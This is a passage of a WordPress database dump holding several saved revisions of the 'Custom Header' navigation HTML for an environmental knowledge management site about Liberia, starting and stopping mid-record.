href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li><a href=\"#\">Bulletin </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n		<a href=\"#\"></a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-5\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			<ul>\n				<li><a href=\"https://www.twitter.com/\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"https://www.facebook.com\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"mailto:co&#110;&#116;&#97;ct&#64;&#101;&#107;&#109;s&#108;&#105;&#98;e&#114;&#105;a&#46;&#105;n&#102;&#111;\" target=\"_self\" rel=\"noopener noreferrer\"></a></li>\n			</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-08 14:49:32','2019-11-08 14:49:32','',30,'https://ekmsliberia.info/2019/11/08/30-revision-v1/',0,'revision','',0),(350,1,'2019-11-08 14:52:13','2019-11-08 14:52:13','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>The Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu-4\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li><li><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li><a href=\"https://ekmsliberia.info/about/\">About </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li><a href=\"#\">Media </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li><a href=\"#\">Bulletin </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n		<a href=\"#\"></a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-5\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			<ul>\n				<li><a href=\"https://www.twitter.com/\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"https://www.facebook.com\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"mailto:&#99;o&#110;&#116;a&#99;t&#64;&#101;&#107;ms&#108;&#105;b&#101;ri&#97;.inf&#111;\" target=\"_self\" rel=\"noopener noreferrer\"></a></li>\n			</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-08 14:52:13','2019-11-08 14:52:13','',30,'https://ekmsliberia.info/2019/11/08/30-revision-v1/',0,'revision','',0),(351,1,'2019-11-08 14:53:27','2019-11-08 14:53:27','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>The Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu-4\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li><li><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li><a href=\"https://ekmsliberia.info/about/\">About </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li><a href=\"#\">Media </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li><a href=\"#\">Bulletin </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n		<a href=\"#\"></a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-5\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			<ul>\n				<li><a href=\"https://www.twitter.com/\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"https://www.facebook.com\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"mailto:&#99;&#111;&#110;t&#97;&#99;t&#64;ekmslib&#101;&#114;i&#97;&#46;info\" target=\"_self\" rel=\"noopener noreferrer\"></a></li>\n			</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-08 14:53:27','2019-11-08 14:53:27','',30,'https://ekmsliberia.info/2019/11/08/30-revision-v1/',0,'revision','',0),(352,1,'2019-11-08 14:54:28','2019-11-08 14:54:28','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>The Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu-4\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li><li><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li><a href=\"https://ekmsliberia.info/about/\">About </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li><a href=\"#\">Media </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li><a href=\"#\">Bulletin </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n		<a href=\"#\"></a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-5\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			<ul>\n				<li><a href=\"https://www.twitter.com/\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"https://www.facebook.com\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"mailto:&#99;&#111;n&#116;ac&#116;&#64;&#101;&#107;m&#115;lib&#101;&#114;&#105;&#97;.inf&#111;\" target=\"_self\" rel=\"noopener noreferrer\"></a></li>\n			</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-08 14:54:28','2019-11-08 14:54:28','',30,'https://ekmsliberia.info/2019/11/08/30-revision-v1/',0,'revision','',0),(353,1,'2019-11-08 14:55:52','2019-11-08 14:55:52','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>The Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu-4\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li><li><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li><a href=\"https://ekmsliberia.info/about/\">About </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li><a href=\"#\">Media </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li><a href=\"#\">Bulletin </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n		<a href=\"#\"></a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-5\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			<ul>\n				<li><a href=\"https://www.twitter.com/\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"https://www.facebook.com\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"mailto:&#99;&#111;&#110;&#116;a&#99;t&#64;&#101;&#107;&#109;&#115;&#108;&#105;b&#101;ri&#97;&#46;&#105;&#110;&#102;o\" target=\"_self\" rel=\"noopener noreferrer\"></a></li>\n			</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-08 14:55:52','2019-11-08 14:55:52','',30,'https://ekmsliberia.info/2019/11/08/30-revision-v1/',0,'revision','',0),(354,1,'2019-11-08 14:58:01','2019-11-08 14:58:01','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>The Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu-4\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li><li><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li><a href=\"https://ekmsliberia.info/about/\">About </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li><a href=\"#\">Media </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li><a href=\"#\">Bulletin </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n		<a href=\"#\"></a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-5\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			<ul>\n				<li><a href=\"https://www.twitter.com/\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"https://www.facebook.com\" target=\"_blank\" rel=\"noopener noreferrer\"></a></li><li><a href=\"mailto:c&#111;&#110;t&#97;ct&#64;&#101;&#107;&#109;&#115;li&#98;&#101;r&#105;&#97;&#46;in&#102;o\" target=\"_self\" rel=\"noopener noreferrer\"></a></li>\n			</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-08 14:58:01','2019-11-08 14:58:01','',30,'https://ekmsliberia.info/2019/11/08/30-revision-v1/',0,'revision','',0),(355,1,'2019-11-08 14:58:11','2019-11-08 14:58:11','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"180\" height=\"98\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Logo-e1573190685865.png\" alt=\"\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>The Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu-4\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li><li><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li><a href=\"https://ekmsliberia.info/conventions-topics/\">Conventions Topics</a></li>	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Institutions Resources</a></li>	<li><a href=\"https://ekmsliberia.info/documents-and-other-resources/\">Documents and Other Resources</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li><a href=\"https://ekmsliberia.info/about/\">About </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/contact/\">Contact</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li><a href=\"#\">Media </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li><a href=\"#\">Bulletin </a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li><a href=\"https://ekmsliberia.info/wp-login.php?action=logout&amp;redirect_to=https%3A%2F%2Fekmsliberia.info%2F%3Foceanwp_library%3Dcustom-header&amp;_wpnonce=b9ef428b2d\">Logout</a></li><li><a href=\"#\"></a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n		<a href=\"#\"></a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-5\"><li><a href=\"https://ekmsliberia.info/homepage/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental 